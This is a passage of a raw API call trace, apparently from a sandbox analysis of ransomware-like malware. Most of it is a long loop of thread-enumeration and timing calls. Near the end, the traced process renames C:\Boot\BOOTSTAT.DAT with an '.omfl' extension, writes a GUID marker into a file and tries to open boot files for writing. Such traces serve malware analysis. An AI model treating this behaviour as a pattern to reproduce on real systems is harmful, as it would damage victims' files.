hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.717] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.718] GetTickCount () returned 0x116f5a9 [0129.718] GetCurrentThreadId () returned 0x618 [0129.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.718] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.719] GetTickCount () returned 0x116f5a9 [0129.719] GetCurrentThreadId () returned 0x618 [0129.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.719] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.719] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.720] GetTickCount () returned 0x116f5b9 [0129.720] GetCurrentThreadId () returned 0x618 [0129.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.720] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.721] GetTickCount () returned 0x116f5b9 [0129.721] GetCurrentThreadId () returned 0x618 [0129.721] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.721] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.721] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.722] GetTickCount () returned 0x116f5b9 [0129.722] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.723] GetTickCount () returned 0x116f5b9 [0129.723] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.724] GetTickCount () returned 0x116f5b9 [0129.724] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.724] GetTickCount () returned 0x116f5b9 [0129.724] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.726] GetTickCount () returned 0x116f5b9 [0129.726] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.726] GetTickCount () returned 0x116f5b9 [0129.726] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.727] GetTickCount () returned 0x116f5b9 [0129.727] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.728] GetTickCount () returned 0x116f5b9 [0129.728] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.728] GetTickCount () returned 0x116f5b9 [0129.729] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.729] GetTickCount () returned 0x116f5b9 [0129.729] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.730] GetTickCount () returned 0x116f5b9 [0129.730] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.731] GetTickCount () returned 0x116f5b9 [0129.731] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.732] GetTickCount () returned 0x116f5b9 [0129.733] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.733] GetTickCount () returned 0x116f5b9 [0129.733] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.734] GetTickCount () returned 0x116f5b9 [0129.734] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.735] GetTickCount () returned 0x116f5c9 [0129.735] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.736] GetTickCount () returned 0x116f5c9 [0129.736] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.737] GetTickCount () returned 0x116f5c9 [0129.737] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.737] GetTickCount () returned 0x116f5c9 [0129.737] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.738] GetTickCount () returned 0x116f5c9 [0129.738] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.739] GetTickCount () returned 0x116f5c9 [0129.739] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.739] GetTickCount () returned 0x116f5c9 [0129.740] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.740] GetTickCount () returned 0x116f5c9 [0129.740] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.741] GetTickCount () returned 0x116f5c9 [0129.741] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.742] GetTickCount () returned 0x116f5c9 [0129.742] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.742] GetTickCount () returned 0x116f5c9 [0129.743] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.743] GetTickCount () returned 0x116f5c9 [0129.743] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.744] GetTickCount () returned 0x116f5c9 [0129.744] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.745] GetTickCount () returned 0x116f5c9 [0129.745] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.745] GetTickCount () returned 0x116f5c9 [0129.745] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.746] GetTickCount () returned 0x116f5c9 [0129.746] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.747] GetTickCount () returned 0x116f5c9 [0129.747] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.748] GetTickCount () returned 0x116f5c9 [0129.748] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.749] GetTickCount () returned 0x116f5c9 [0129.749] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.750] GetTickCount () returned 0x116f5c9 [0129.750] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.751] GetTickCount () returned 0x116f5d8 [0129.751] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.751] GetTickCount () returned 0x116f5d8 [0129.751] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.752] GetTickCount () returned 0x116f5d8 [0129.752] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.753] GetTickCount () returned 0x116f5d8 [0129.753] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.753] GetTickCount () returned 0x116f5d8 [0129.754] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.754] GetTickCount () returned 0x116f5d8 [0129.754] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.755] GetTickCount () returned 0x116f5d8 [0129.755] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.756] GetTickCount () returned 0x116f5d8 [0129.756] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.756] GetTickCount () returned 0x116f5d8 [0129.756] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.757] GetTickCount () returned 0x116f5d8 [0129.757] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.758] GetTickCount () returned 0x116f5d8 [0129.758] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.759] GetTickCount () returned 0x116f5d8 [0129.759] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.759] GetTickCount () returned 0x116f5d8 [0129.759] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.760] GetTickCount () returned 0x116f5d8 [0129.760] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.761] GetTickCount () returned 0x116f5d8 [0129.761] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.762] GetTickCount () returned 0x116f5d8 [0129.762] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.763] GetTickCount () returned 0x116f5d8 [0129.763] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.763] GetTickCount () returned 0x116f5d8 [0129.763] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.764] GetTickCount () returned 0x116f5d8 [0129.764] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.765] GetTickCount () returned 0x116f5d8 [0129.765] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.765] GetTickCount () returned 0x116f5d8 [0129.766] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.766] GetTickCount () returned 0x116f5e8 [0129.766] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.767] GetTickCount () returned 0x116f5e8 [0129.767] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.768] GetTickCount () returned 0x116f5e8 [0129.768] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.769] GetTickCount () returned 0x116f5e8 [0129.769] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.770] GetTickCount () returned 0x116f5e8 [0129.770] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.770] GetTickCount () returned 0x116f5e8 [0129.770] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.771] GetTickCount () returned 0x116f5e8 [0129.771] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.772] GetTickCount () returned 0x116f5e8 [0129.772] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.773] GetTickCount () returned 0x116f5e8 [0129.773] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.774] GetTickCount () returned 0x116f5e8 [0129.774] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.775] GetTickCount () returned 0x116f5e8 [0129.775] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.776] GetTickCount () returned 0x116f5e8 [0129.776] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.777] GetTickCount () returned 0x116f5e8 [0129.777] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.778] GetTickCount () returned 0x116f5e8 [0129.778] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.779] GetTickCount () returned 0x116f5e8 [0129.779] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.780] GetTickCount () returned 0x116f5e8 [0129.780] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.781] GetTickCount () returned 0x116f5e8 [0129.781] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.783] GetTickCount () returned 0x116f5f7 [0129.783] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.784] GetTickCount () returned 0x116f5f7 [0129.784] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.785] GetTickCount () returned 0x116f5f7 [0129.785] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.786] GetTickCount () returned 0x116f5f7 [0129.786] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.787] GetTickCount () returned 0x116f5f7 [0129.787] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.788] GetTickCount () returned 0x116f5f7 [0129.788] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.789] GetTickCount () returned 0x116f5f7 [0129.789] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.790] GetTickCount () returned 0x116f5f7 [0129.790] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.791] GetTickCount () returned 0x116f5f7 [0129.791] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.792] GetTickCount () returned 0x116f5f7 [0129.792] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.793] GetTickCount () returned 0x116f5f7 [0129.793] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.794] GetTickCount () returned 0x116f5f7 [0129.794] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.796] GetTickCount () returned 0x116f5f7 [0129.796] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.797] GetTickCount () returned 0x116f5f7 [0129.797] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.798] GetTickCount () returned 0x116f607 [0129.798] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.798] GetTickCount () returned 0x116f607 [0129.798] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.799] GetTickCount () returned 0x116f607 [0129.799] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.800] GetTickCount () returned 0x116f607 [0129.800] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.801] GetTickCount () returned 0x116f607 [0129.801] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.801] GetTickCount () returned 0x116f607 [0129.801] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.802] GetTickCount () returned 0x116f607 [0129.802] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.803] GetTickCount () returned 0x116f607 [0129.803] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.804] GetTickCount () returned 0x116f607 [0129.804] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.805] GetTickCount () returned 0x116f607 [0129.805] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.806] GetTickCount () returned 0x116f607 [0129.806] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.807] GetTickCount () returned 0x116f607 [0129.807] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.808] GetTickCount () returned 0x116f607 [0129.808] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.808] GetTickCount () returned 0x116f607 [0129.809] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.809] GetTickCount () returned 0x116f607 [0129.809] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.810] GetTickCount () returned 0x116f607 [0129.810] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.812] GetTickCount () returned 0x116f607 [0129.812] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.813] GetTickCount () returned 0x116f607 [0129.882] FreeLibrary (hLibModule=0x76d30000) returned 1 [0129.882] QueryPerformanceCounter (in: lpPerformanceCount=0xe00efa4 | out: lpPerformanceCount=0xe00efa4*=37005625833) returned 1 [0129.883] GlobalMemoryStatus (in: lpBuffer=0xe00f414 | out: lpBuffer=0xe00f414) [0129.885] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x10000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.885] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0129.886] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0129.886] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0129.886] CloseHandle (hObject=0x5c8) returned 1 [0129.889] MoveFileW (lpExistingFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\Boot\\BOOTSTAT.DAT.omfl" (normalized: "c:\\boot\\bootstat.dat.omfl")) returned 1 [0129.892] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0129.892] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0129.892] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe373bb00, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0129.892] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0129.893] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0129.893] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37adf20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37adf20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0129.893] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37d4080, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37d4080, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0129.893] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37fa1e0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37fa1e0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0129.893] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3820340, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3820340, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0129.893] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38464a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38464a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0129.893] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0129.893] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0129.893] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3892760, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3892760, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0129.893] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0129.893] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0129.893] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.894] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0129.894] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0129.894] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38dea20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38dea20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0129.894] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0129.894] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0129.894] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe392ace0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, 